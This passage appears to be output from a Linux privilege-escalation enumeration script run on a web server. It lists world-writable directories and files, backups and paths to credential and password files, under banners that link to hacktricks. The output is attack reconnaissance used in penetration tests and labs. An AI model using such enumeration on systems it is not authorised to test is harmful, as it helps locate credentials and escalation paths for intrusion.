-rw-r--r-- 1 root root 66 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/validate-npm-package-name/.travis.yml
|
|
-rw-r--r-- 1 root root 43 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/archy/.travis.yml
|
|
-rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/through2/node_modules/readable-stream/.travis.yml
|
|
-rw-r--r-- 1 root root 309 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/agent-base/.travis.yml
|
|
-rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmpublish/.travis.yml
|
|
grep: write error: Broken pipe
|
|
grep: write error: Broken pipe
|
|
|
|
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
|
|
-rw-r--r-- 1 root root 32707 Jan 13 10:52 /var/backups/apt.extended_states.0
|
|
-rw-r--r-- 1 root root 3743 Nov 20 22:36 /var/backups/apt.extended_states.3.gz
|
|
-rw-r--r-- 1 root root 3524 Jan 12 10:24 /var/backups/apt.extended_states.1.gz
|
|
-rw-r--r-- 1 root root 3523 Jan 10 12:46 /var/backups/apt.extended_states.2.gz
|
|
|
|
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
|
|
/dev/mqueue
|
|
/dev/shm
|
|
/run/lock
|
|
/run/php
|
|
/run/screen
|
|
/tmp
|
|
/tmp/.ICE-unix
|
|
/tmp/.Test-unix
|
|
/tmp/.X11-unix
|
|
/tmp/.XIM-unix
|
|
/tmp/.font-unix
|
|
#)You_can_write_even_more_files_inside_last_directory
|
|
|
|
/var/cache/apache2/mod_cache_disk
|
|
/var/crash
|
|
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/auditd.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/cloud-config.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/cloud-init-local.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mapper-ubuntux2dx2dvgx2dswap.swap/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/php7.4-fpm.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/starting-page.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2x2dpvscan.slice/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/uuidd.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control
|
|
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
|
|
/var/lib/nginx/body
|
|
/var/lib/nginx/fastcgi
|
|
/var/lib/nginx/proxy
|
|
/var/lib/nginx/scgi
|
|
/var/lib/nginx/uwsgi
|
|
/var/lib/php/sessions
|
|
/var/tmp
|
|
/var/www
|
|
|
|
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
|
|
|
|
╔══════════╣ Searching passwords in history files
|
|
treatment of @ARGV elements
|
|
<li>Minor change to parsing of -@ argfile (comment lines may may no longer have
|
|
<li>No longer trim trailing spaces from arguments in -@ argfiles
|
|
<li>Added -password option for processing password-protected PDF documents
|
|
<li>Added Password option
|
|
<li>Improved -@ option to allow a UTF-8 BOM at the start of the input file
|
|
<li>Changed -@ to insert arguments at the current position in the command line
|
|
<li>Fixed bug introduced in 5.99 which broke the "-tagsFromFile @" feature
|
|
<li>Fixed problem which generated warnings about symbol "@indent" in Nikon.pm
|
|
expanded beyond its "Image" roots!)
|
|
<li>Assume '-TagsFromFile @' for any redirected tags (eg. '-SRCTAG>DSTTAG' or
|
|
<li>Ignore white space around '=' sign of arguments in '-@' file
|
|
<li>Fixed problem with new '-tagsFromFile @' feature which occurred when
|
|
<li>Allow target file to be specified by '@' with -TagsFromFile option
|
|
<li>Added -@ option and two utility files (iptc2xmp.args and xmp2iptc.args) to
|
|
|
|
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
|
|
/bin/systemd-ask-password
|
|
/bin/systemd-tty-ask-password-agent
|
|
/etc/pam.d/common-password
|
|
/usr/lib/git-core/git-credential
|
|
/usr/lib/git-core/git-credential-cache
|
|
/usr/lib/git-core/git-credential-cache--daemon
|
|
/usr/lib/git-core/git-credential-store
|
|
#)There are more creds/passwds files in the previous parent folder
|
|
|
|
/usr/lib/grub/i386-pc/password.mod
|
|
/usr/lib/grub/i386-pc/password_pbkdf2.mod
|
|
/usr/lib/node_modules/npm/lib/config/clear-credentials-by-uri.js
|
|
/usr/lib/node_modules/npm/lib/config/get-credentials-by-uri.js
|
|
/usr/lib/node_modules/npm/lib/config/set-credentials-by-uri.js
|
|
/usr/lib/python3/dist-packages/cloudinit/config/__pycache__/cc_set_passwords.cpython-36.pyc
|
|
/usr/lib/python3/dist-packages/cloudinit/config/cc_set_passwords.py
|
|
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-36.pyc
|
|
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-36.pyc
|
|
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
|
|
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
|
|
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc
|
|
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
|
|
/usr/share/dns/root.key
|
|
/usr/share/doc/git/contrib/credential
|
|
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
|
|
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
|
|
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
|
|
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
|
|
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
|
|
/usr/share/man/man1/git-credential-cache--daemon.1.gz
|
|
/usr/share/man/man1/git-credential-cache.1.gz
|
|
/usr/share/man/man1/git-credential-store.1.gz
|
|
/usr/share/man/man1/git-credential.1.gz
|
|
#)There are more creds/passwds files in the previous parent folder
|
|
|
|
/usr/share/man/man7/gitcredentials.7.gz
|
|
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
|
|
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
|
|
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
|
|
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
|
|
#)There are more creds/passwds files in the previous parent folder
|
|
|
|
/usr/share/pam/common-password.md5sums
|
|
/var/cache/debconf/passwords.dat
|
|
/var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords
|
|
/var/lib/pam/password
|
|
/var/www/starting-page/blog/node_modules/caniuse-lite/data/features/credential-management.js
|
|
/var/www/starting-page/blog/node_modules/caniuse-lite/data/features/passwordrules.js
|
|
|
|
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
|